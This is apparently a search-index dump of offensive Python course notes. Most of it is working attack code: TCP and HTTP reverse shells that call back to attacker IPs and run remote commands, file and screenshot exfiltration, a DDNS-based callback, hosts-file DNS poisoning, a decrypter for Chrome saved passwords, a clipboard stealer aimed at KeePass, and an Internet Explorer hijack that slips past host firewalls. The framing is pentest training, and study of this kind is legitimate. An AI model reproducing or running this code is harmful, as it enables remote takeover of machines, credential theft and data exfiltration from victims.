stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
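From the attacker's shell prompt the expected syntax is scan <ip>:<comma-separated ports>; an illustrative interaction (the IP and ports are examples):

Shell> scan 10.10.10.100:22,80,443\n[+] Port 22 is opened\n[+] Port 80 is opened\n[-] Port 443 is closed\n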
                                  ","tags":["python","python pentesting","scripting","reverse shell","port scanner"]},{"location":"python/coding-a-reverse-shell-that-searches-files/","title":"Coding a reverse shell that searches files","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-reverse-shell-that-searches-files/#client-side","title":"Client side","text":"

To be run on the victim's machine.

import requests\nimport os\nimport subprocess\nimport time\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            filer = {'file': open(path, 'rb')}\n            r = requests.post(url, files=filer)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n    elif 'search' in command: # The formula is search <path>*.<file extension> -- for example: search C:\\\\*.pdf\n        command = command[7:] # cut off the first 7 characters; the result would be C:\\\\*.pdf\n        path, ext = command.split('*')\n        lists = '' # a string where we will append our results\n\n# os.walk navigates ALL the directories under the provided path and returns three values:\n# 1- dirpath is a string containing the path to the directory\n# 2- dirnames is a list of the names of the subdirectories in dirpath\n# 3- files is a list of the file names in dirpath\n\n# Once we get the files list, we check each file (using a for loop); if the file extension matches what we are looking for, we add the file's full path to the lists string.\n\n        for dirpath, dirnames, files in os.walk(path):\n           for file in files:\n               if file.endswith(ext):\n                   lists = lists + '\\n' + os.path.join(dirpath, file)\n        requests.post(url='http://192.168.0.152:8080', data=lists)\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
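From the attacker's HTTP shell prompt, the syntax is search <path>*<extension>; an illustrative interaction (paths and hits are examples):

Shell> search C:\\Users*.pdf\nC:\\Users\\victim\\Documents\\report.pdf\nC:\\Users\\victim\\Downloads\\invoice.pdf\n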
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/","title":"Coding a TCP connection and a reverse shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#basic-connection","title":"Basic connection","text":"

From the eJPT study module and the book Computer Networking.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

                                  from socket import *\nserverName = \"servername or ip\"\nserverPort = 12000\n\nclientSocket = socket(AF_INET, SOCK_STREAM)\nclientSocket.connect((serverName, serverPort))\n\nsentence = str(input(\"Enter a sentence in lower case: \"))\nclientSocket.send(sentence.encode())\nmodifiedSentence = clientSocket.recv(1024)\n\nprint(\"From server: \", modifiedSentence.decode())\nclientSocket.close()\n

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side","title":"Server side","text":"
                                  from socket import *\n\nserverPort = 12000\nserverSocket = socket(AF_INET, SOCK_STREAM)\n\nserverSocket.bind(('', serverPort))\nserverSocket.listen(1)\nprint(\"Server is ready to receive...\")\n\nwhile True:\n    connectionSocket, addr = serverSocket.accept()\n    sentence = connectionSocket.recv(1024).decode()\n    capitalizedsentence = sentence.upper()\n    connectionSocket.send(capitalizedsentence.encode())\n    connectionSocket.close()\n
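Run the server first, then the client; a sample exchange, assuming the two snippets are saved as server.py and client.py:

$ python3 server.py\nServer is ready to receive...\n\n$ python3 client.py\nEnter a sentence in lower case: hello world\nFrom server:  HELLO WORLD\n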
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#reverse-tcp-connection","title":"Reverse TCP connection","text":"

From the course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#client-side_1","title":"Client side","text":"

To be run on the victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket    # For Building TCP Connection\nimport subprocess # To start the shell in the system\n\ndef connect():\n    s = socket.socket()\n    s.connect(('10.0.2.6', 1234)) # Here we define the Attacker IP and the listening port\n\n    while True:\n        command = s.recv(1024) # keep receiving commands from the Kali machine, read the first KB of the tcp socket\n\n        if 'terminate' in command.decode(): # if we got terminate order from the attacker, close the socket and break the loop\n            s.close()\n            break\n        else:   # otherwise, we pass the received command to a shell process\n\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stdout.read()) # send back the result\n            s.send(CMD.stderr.read()) # send back the error -if any-, such as syntax error\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#server-side_1","title":"Server side","text":"

To be run on the attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the queue; I made it 1 as we are expecting a single connection from a single target\n    conn, addr = s.accept() # accept() will return the connection object (conn) and the client (target) IP address and source port as a tuple (IP, port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got the terminate command, inform the client, close the connection and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif command == '': # If the user just hits enter, we send a whoami command (the original tested '' in command, which matches EVERY string and made the else branch unreachable)\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-a-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/","title":"Coding an http reverse shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

                                  # Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport requests\nimport subprocess\nimport time\n\nwhile True:\n\n    req = requests.get('http://192.168.0.152:8080') # Send GET request to our kali server\n    command = req.text # Store the received txt into command variable\n\n    if 'terminate' in command:\n        break\n\n    else:\n        CMD = subprocess.Popen(command, shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read()) # POST the result\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read()) # or the error -if any-\n\n    time.sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/coding-an-http-reverse-shell/#server-side","title":"Server side","text":"

To be run on the attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport http.server\n\nHOST_NAME = \"192.168.0.152\" # our attacker machine (the original used //, which is not a Python comment and breaks the script)\nPORT_NUMBER = 8080 # attacker listening port\n\nclass MyHandler(http.server.BaseHTTPRequestHandler): # MyHandler defines what we should do when we receive a GET/POST\n\n    def do_GET(self):\n\n        command = input(\"Shell> \")\n        self.send_response(200)\n        self.send_header(\"Content-type\", \"text/html\")\n        self.end_headers()\n        self.wfile.write(command.encode())\n\n    def do_POST(self):\n\n        self.send_response(200)\n        self.end_headers()\n        length = int(self.headers['Content-length']) # how many bytes the HTTP POST data contains; the length value has to be an integer\n        postVar = self.rfile.read(length)\n        print(postVar.decode())\n\nif __name__ == \"__main__\":\n\n    # Start a server: create an httpd object and pass our Kali IP, port number and class handler (MyHandler)\n    server_class = http.server.HTTPServer\n    httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler)\n    try:\n        httpd.serve_forever() # start the HTTP server; on Ctrl+C we interrupt and stop the server\n    except KeyboardInterrupt:\n        print('[!] Server is terminated')\n        httpd.server_close()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/ddns-aware-shell/","title":"Coding a DDNS aware shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.


When coding a reverse shell you don't need to hardcode the attacker machine's IP address. Instead, you can use a Dynamic DNS service such as https://www.noip.com/. To keep that service informed of our attacker machine's public IP address, we install a Linux dynamic update client on our Kali machine (an agent that pushes IP updates to the service).

See noip to learn how to install a Linux dynamic update client on the attacker machine.

After installing the agent, let's look at the modification needed on the client side of the TCP reverse shell: resolve the DDNS hostname at runtime instead of connecting to a fixed IP.
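The essential change is a single lookup before connecting; a minimal sketch (the hostname is just an example):

import socket\n\n# Resolve the DDNS name at runtime so the shell always follows the\n# attacker's current public IP instead of a hardcoded address\nip = socket.gethostbyname('example-attacker.ddns.net')\nprint(ip)\n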

                                  ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/ddns-aware-shell/#client-side","title":"Client side","text":"
# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while len(packet) > 0:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('File not found'.encode())\ndef connecting(ip):\n    s = socket.socket()\n    s.connect((ip, 8080))\n\n    while True:\n        command = s.recv(1024)\n\n        if 'terminate' in command.decode():\n            s.close()\n            break\n\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split(\"*\")\n            try:\n                transfer(s, path)\n            except:\n                pass\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True,stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n            s.send(CMD.stderr.read())\n            s.send(CMD.stdout.read())\ndef main():\n    ip = socket.gethostbyname('cared.ddns.net')\n    print (ip)\n    connecting(ip) # note: the original had a stray 'return' before this call, which made the shell unreachable\nmain()\n
                                  ","tags":["python","python pentesting","scripting","ddns","reverse shell"]},{"location":"python/dns-poisoning/","title":"DNS poisoning","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.


1. Add a new line to the Windows hosts file mapping a domain to the attacker IP:

echo 10.10.120.12 google.com >> c:\Windows\System32\drivers\etc\hosts\n

2. Flush the DNS cache to make sure the updated record is used:

                                  ipconfig /flushdns\n

Traffic for that domain will now be redirected to the attacker machine.
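A quick way to verify the poisoned entry (an extra check, not part of the original notes) is a ping, since ping resolves through the hosts file; the reply should come from 10.10.120.12. Note that nslookup would not reflect the change, because it queries the DNS server directly and bypasses the hosts file.

ping google.com\n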

                                  ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dns-poisoning/#python-script-for-dns-poisoning","title":"Python script for DNS poisoning","text":"
import subprocess\nimport os\n\n# Use a raw string so the backslashes in the Windows path are not treated as escape sequences\nos.chdir(r\"C:\\Windows\\System32\\drivers\\etc\")\n\ncommand = \"echo 10.10.10.100 www.google.com >> hosts\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n\ncommand = \"ipconfig /flushdns\"\n\nCMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n
                                  ","tags":["python","python pentesting","techniques","DNS poisoning"]},{"location":"python/dumping-chrome-saved-passwords/","title":"Dumping saved passwords from Google Chrome","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#how-does-chrome-saved-passwords-work","title":"How does Chrome saved passwords work?","text":"

Chrome uses the Windows session password to encrypt and decrypt saved passwords. The encrypted passwords are stored in a SQLite database called \"Login Data\", located at:

                                  C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

To encrypt, Chrome calls the Windows API function \"CryptProtectData\", which uses the Windows login password as the encryption key; for the reverse operation it calls \"CryptUnprotectData\" to decrypt the password value back to clear text.
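A minimal sketch of that DPAPI round trip, assuming the pywin32 package is installed (the secret and description strings are just examples):

import win32crypt  # pip install pywin32\n\nsecret = 'hunter2'.encode()\n\n# CryptProtectData encrypts with a key derived from the current Windows login session\nblob = win32crypt.CryptProtectData(secret, 'demo', None, None, None, 0)\n\n# CryptUnprotectData only succeeds inside the same user's session;\n# it returns a (description, plaintext) tuple\ndesc, plaintext = win32crypt.CryptUnprotectData(blob, None, None, None, 0)\nprint(plaintext.decode())  # hunter2\n

Because the key is tied to the user's session, decryption has to run as the victim, which is exactly what a reverse shell provides.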

1. Install DB Browser for SQLite from: https://sqlitebrowser.org/dl/

2. Open DB Browser for SQLite.

3. In Windows Explorer, go to the path where the SQLite db is stored and copy the \"Login Data\" file to your Desktop.

4. Change the extension of the \"Login Data\" file to .sqlite3

5. Open \"Login Data.sqlite3\" in DB Browser for SQLite.

6. Go to the \"Browse Data\" tab (\"Hoja de Datos\" in the Spanish UI) and select the logins table. There you have all the stored passwords.

                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#our-script","title":"Our script","text":"

The roadmap for this script:

1. Guess the path to the SQLite database from the victim's username and browser:

C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\n

2. Feed the password value from each row of the \"logins\" table in \"Login Data.sqlite3\" to the CryptUnprotectData function.

3. Exfiltrate the passwords through a reverse shell.

                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-for-gathering-passwords","title":"Script for gathering passwords","text":"

Here is the script provided in the course (it doesn't work against Chrome v80+, which switched to AES-encrypted passwords; a working script is pasted below):

                                  # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\n\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB, so there are no conflicts in case that the user is using the original (maybe she is logged into facebook, let's say)\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n

A script that works against current Chrome versions. Requirements:

                                  pip install PyCryptodome\n

                                  Script:

                                  import os\nimport json\nimport base64\nimport sqlite3\nimport win32crypt\nfrom Crypto.Cipher import AES\nimport shutil\n\ndef get_master_key():\n    with open(os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\Local State', \"r\") as f:\n        local_state = f.read()\n        local_state = json.loads(local_state)\n    master_key = base64.b64decode(local_state[\"os_crypt\"][\"encrypted_key\"])\n    master_key = master_key[5:]  # removing DPAPI\n    master_key = win32crypt.CryptUnprotectData(master_key, None, None, None, 0)[1]\n    return master_key\n\ndef decrypt_payload(cipher, payload):\n    return cipher.decrypt(payload)\n\ndef generate_cipher(aes_key, iv):\n    return AES.new(aes_key, AES.MODE_GCM, iv)\n\ndef decrypt_password(buff, master_key):\n    try:\n        iv = buff[3:15]\n        payload = buff[15:]\n        cipher = generate_cipher(master_key, iv)\n        decrypted_pass = decrypt_payload(cipher, payload)\n        decrypted_pass = decrypted_pass[:-16].decode()  # remove suffix bytes\n        return decrypted_pass\n    except Exception as e:\n        # print(\"Probably saved password from Chrome version older than v80\\n\")\n        # print(str(e))\n        return \"Chrome < 80\"\n\n\nmaster_key = get_master_key()\nlogin_db = os.environ['USERPROFILE'] + os.sep + r'AppData\\Local\\Google\\Chrome\\User Data\\default\\Login Data'\nshutil.copy2(login_db, \"Loginvault.db\") #making a temp copy since Login Data DB is locked while Chrome is running\nconn = sqlite3.connect(\"Loginvault.db\")\ncursor = conn.cursor()\ntry:\n    cursor.execute(\"SELECT action_url, username_value, password_value FROM logins\")\n    for r in cursor.fetchall():\n        url = r[0]\n        username = r[1]\n        encrypted_password = r[2]\n        decrypted_password = decrypt_password(encrypted_password, master_key)\n        if len(username) > 0:\n            print(\"URL: \" + url + \"\\nUser Name: \" + username + \"\\nPassword: \" + decrypted_password + \"\\n\" + \"*\" * 50 + \"\\n\")\nexcept Exception as e:\n    pass\ncursor.close()\nconn.close()\ntry:\n    os.remove(\"Loginvault.db\")\nexcept Exception as e:\n    pass\n
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/dumping-chrome-saved-passwords/#script-with-gathering-passwords-phase-integrated-in-a-reverse-shell","title":"Script with gathering passwords phase integrated in a reverse shell","text":"
                                  # Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nimport json\nimport base64\nfrom os import getenv \n# To find out the Chrome SQL path- C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\n\nimport sqlite3 # To read the Chrome SQLite DB\nfrom Crypto.Cipher import AES\nimport win32crypt  # High level library to call windows API CryptUnprotectData\n\nfrom shutil import copyfile # To make a copy of the Chrome SQLite DB\n\n\n# LOCALAPPDATA is a Windows Environment Variable which points to >>> C:\\Users\\{username}\\AppData\\Local\npath = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login Data\"\n\n# make a copy the Login Data DB and pull data out of the copied DB\npath2 = getenv(\"LOCALAPPDATA\")+r\"\\Google\\Chrome\\User Data\\Default\\Login2\"\ncopyfile(path, path2)\n\n# Connect to the copied Database\nconn = sqlite3.connect(path2)\n\n\ncursor = conn.cursor() #Create a Cursor object and call its execute() method to perform SQL commands like SELECT\n\n# SELECT column_name,column_name FROM table_name\n# SELECT action_url and username_value and password_value FROM table logins\ncursor.execute('SELECT action_url, username_value, password_value FROM logins')\n\n\n# To retrieve data after executing a SELECT statement, we call fetchall() to get a list of the matching rows.\nfor raw in cursor.fetchall():\n\n    print(raw[0] + '\\n' + raw[1]) # print the action_url (raw[0]) and print the username_value (raw[1])\n\n    password = win32crypt.CryptUnprotectData(raw[2])[1] # pass the encrypted Password to CryptUnprotectData API function to decrypt it  \n\n    print(password)\nconn.close()\n
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/","title":"Hickjack the Internet Explorer process to bypass an host-based firewall","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.


To bypass a host-based firewall (one based on an ACL of allowed processes), we will hijack the Internet Explorer process and hide our traffic inside it.

                                  ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hickjack-internet-explorer-process-to-bypass-an-host-based-firewall/#client-side","title":"Client side","text":"

Make sure the victim machine (Windows 10) has these two Python libraries installed: pypiwin32 and pywin32.
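For example (a minimal install sketch; pypiwin32 is only a thin wrapper that pulls in pywin32):

pip install pywin32 pypiwin32\n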

To be run on the victim's machine.

# Python For Offensive PenTest: A Complete Practical Course  - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\nfrom win32com.client import Dispatch\nfrom time import sleep\nimport subprocess\n\nie = Dispatch(\"InternetExplorer.Application\") # Create a browser instance\nie.Visible = 0 # Make it invisible [ run in background ] (1 = visible)\n\n# Parameters for POST\ndURL = \"http://192.168.0.152\"  \nFlags = 0\nTargetFrame = 0\n\n\nwhile True:\n    ie.Navigate(\"http://192.168.0.152\") # Navigate to our Kali web server (the attacker machine) to grab the attacker's commands\n    while ie.ReadyState != 4: # Wait for the browser to finish loading\n        sleep(1)\n\n    command = ie.Document.body.innerHTML \n    command = command.encode() # encode the command\n    if 'terminate' in command.decode():\n        ie.Quit() # quit IE and end the process\n        break\n    else:\n        CMD = subprocess.Popen(command.decode(), shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE, stdout=subprocess.PIPE)\n        Data = CMD.stdout.read()\n        PostData = memoryview( Data ) # to submit or POST data using the COM technique, the data must be buffered first using memoryview\n        ie.Navigate(dURL, Flags, TargetFrame, PostData) # POST the command execution result along with the POST parameters we defined earlier\n\n    sleep(3)\n
                                  ","tags":["python","python pentesting","scripting","reverse shell","bypassing techniques","host based firewall"]},{"location":"python/hijacking-keepass/","title":"Hijacking Keepass Password Manager","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

# Python For Offensive PenTest: A Complete Practical Course- All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\n# pip install pyperclip\n\nimport pyperclip \nimport time\n\nlist = [] # a list which will store the clipboard contents\n\nwhile True: # infinite loop to continuously check the clipboard\n\n    if pyperclip.paste() != '': # if the clipboard content is not empty (paste() returns an empty string, not the string 'None', when nothing is there)\n        value = pyperclip.paste() # take its value and put it into a variable called value\n\n# to make sure we don't get duplicated items in our list, we check whether the value was stored earlier before appending it; if not, it is a new item and we append it\n\n        if value not in list:\n            list.append(value)\n\n        print(list)\n\n    time.sleep(3) # sleep outside the if, so an empty clipboard doesn't cause a busy loop\n
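KeePass, like most password managers, places a credential on the system clipboard when the user copies an entry, which is what this monitor exploits. Left running, it accumulates everything the user copies; sample output (contents illustrative):

['P@ssw0rd123!']\n['P@ssw0rd123!', 'https://intranet.example.com/login']\n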
                                  ","tags":["python","python pentesting","scripting","keylogger"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/","title":"Including cd command into TCP reverse shell","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#client-side","title":"Client side","text":"

To be run on the victim's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\nimport subprocess\nimport os\n\ndef transfer(s, path):\n    if os.path.exists(path):\n        f = open(path, 'rb')\n        packet = f.read(1024)\n        while packet:\n            s.send(packet)\n            packet = f.read(1024)\n        s.send('DONE'.encode())\n        f.close()\n    else:\n        s.send('Unable to find the file'.encode())\n\ndef connect():\n    s = socket.socket()\n    s.connect(('192.168.0.152', 8080))\n    while True:\n        command = s.recv(1024)\n        if 'terminate' in command.decode():\n            s.close()\n            break\n        elif 'grab' in command.decode():\n            grab, path = command.decode().split('*')\n            try:\n                transfer(s, path)\n            except Exception as e:\n                s.send(str(e).encode())\n                pass\n        elif command.decode().startswith('cd*'): # the syntax is cd*directory; startswith avoids matching commands that merely contain 'cd'\n            code, directory = command.decode().split('*')\n            try:\n                os.chdir(directory) # change the directory \n                s.send(('[+] CWD is ' + os.getcwd()).encode()) # send back a string with the new current working directory\n            except Exception as e:\n                s.send(('[-]  ' + str(e)).encode())\n        else:\n            CMD = subprocess.Popen(command.decode(), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n            s.send(CMD.stdout.read())\n            s.send(CMD.stderr.read())\n\ndef main():\n    connect()\n\nmain()\n
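From the server side the syntax is cd*<directory> (the asterisk is the delimiter the client splits on); for example:

Shell> cd*C:\\Users\n[+] CWD is C:\\Users\n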
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#server-side","title":"Server side","text":"

To be run on the attacker's computer.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport socket\n\ndef connect():\n\n    s = socket.socket()\n    s.bind((\"10.0.2.15\", 1234))\n    s.listen(1) # define the backlog size for the queue; I made it 1 as we are expecting a single connection from a single target\n    conn, addr = s.accept() # accept() will return the connection object (conn) and the client (target) IP address and source port as a tuple (IP, port)\n    print ('[+] We got a connection from', addr)\n\n    while True:\n\n        command = input(\"Shell> \")\n\n        if 'terminate' in command: # If we got the terminate command, inform the client, close the connection and break the loop\n            conn.send('terminate'.encode())\n            conn.close()\n            break\n        elif command == '': # If the user just hits enter, we send a whoami command (the original tested '' in command, which matches EVERY string and made the else branch unreachable)\n            conn.send('whoami'.encode()) \n            print( conn.recv(1024).decode()) \n        else:\n            conn.send(command.encode()) # Otherwise we send the command to the target\n            print( conn.recv(1024).decode()) # print the result that we got back\n\ndef main():\n    connect()\nmain()\n
                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/including-cd-command-into-tcp-reverse-shell/#using-pyinstaller","title":"Using pyinstaller","text":"

                                  See pyinstaller.

                                  ","tags":["python","python pentesting","scripting","reverse shell"]},{"location":"python/making-a-screenshot/","title":"Making a screenshot","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-a-screenshot/#client-side","title":"Client side","text":"

                                  To be run on the victim's machine.

# Python For Offensive PenTest: A Complete Practical Course - All rights reserved \n# Follow me on LinkedIn  https://jo.linkedin.com/in/python2\n\n\nimport requests\nimport os\nimport subprocess\nimport time\n\n\nfrom PIL import ImageGrab # Used to grab a screenshot\nimport tempfile           # Used to create a temp directory\nimport shutil             # Used to remove the temp directory\n\n\nwhile True:\n    req = requests.get('http://192.168.0.152:8080')\n    command = req.text\n    if 'terminate' in command:\n        break\n    elif 'grab' in command:\n        grab, path = command.split(\"*\")\n        if os.path.exists(path):\n            url = \"http://192.168.0.152:8080/store\"\n            files = {'file': open(path, 'rb')}\n            r = requests.post(url, files=files)\n        else:\n            post_response = requests.post(url='http://192.168.0.152:8080', data='[-] Not able to find the file!'.encode())\n\n    elif 'screencap' in command: # If we got the screencap keyword\n\n        dirpath = tempfile.mkdtemp() # Create a temp dir to store our screenshot file\n        ImageGrab.grab().save(os.path.join(dirpath, 'img.jpg'), \"JPEG\") # Save the screencap in the temp dir\n\n        url = \"http://192.168.0.152:8080/store\"\n        files = {'file': open(os.path.join(dirpath, 'img.jpg'), 'rb')}\n        r = requests.post(url, files=files) # Transfer the file over HTTP\n\n        files['file'].close() # Once the file has been transferred, close it\n        shutil.rmtree(dirpath) # Remove the entire temp dir\n\n    else:\n        CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stdout.read())\n        post_response = requests.post(url='http://192.168.0.152:8080', data=CMD.stderr.read())\n    time.sleep(3)\n
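
The client above expects an HTTP listener on the attacker machine that serves commands on / and accepts multipart uploads on /store. A minimal sketch of the upload half of such a listener, using Flask (the framework choice and the file layout are assumptions for illustration, not the course's own server):

from flask import Flask, request\n\napp = Flask(__name__)\n\n@app.route('/store', methods=['POST'])\ndef store():\n    f = request.files['file'] # the multipart field name used by the client\n    f.save('./' + f.filename) # save the uploaded screenshot locally\n    return ''\n\napp.run(host='192.168.0.152', port=8080)\n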
                                  ","tags":["python","python pentesting","scripting","reverse shell","screenshot capturer"]},{"location":"python/making-your-binary-persistent/","title":"Making your binary persistent","text":"

                                  From course: Python For Offensive PenTest: A Complete Practical Course.

                                  General index of the course
                                  • Gaining persistence shells (TCP + HTTP):
                                    • Coding a TCP connection and a reverse shell.
                                    • Coding a low level data exfiltration - TCP connection.
                                    • Coding an http reverse shell.
                                    • Coding a data exfiltration script for a http shell.
  • Tuning the connection attempts.
  • Including cd command into TCP reverse shell.
• Advanced scriptable shells:
  • Using a Dynamic DNS instead of your bare attacker public IP.
  • Making your binary persistent.
  • Making a screenshot.
  • Coding a reverse shell that searches files.
• Techniques for bypassing filters:
  • Coding a reverse shell that scans ports.
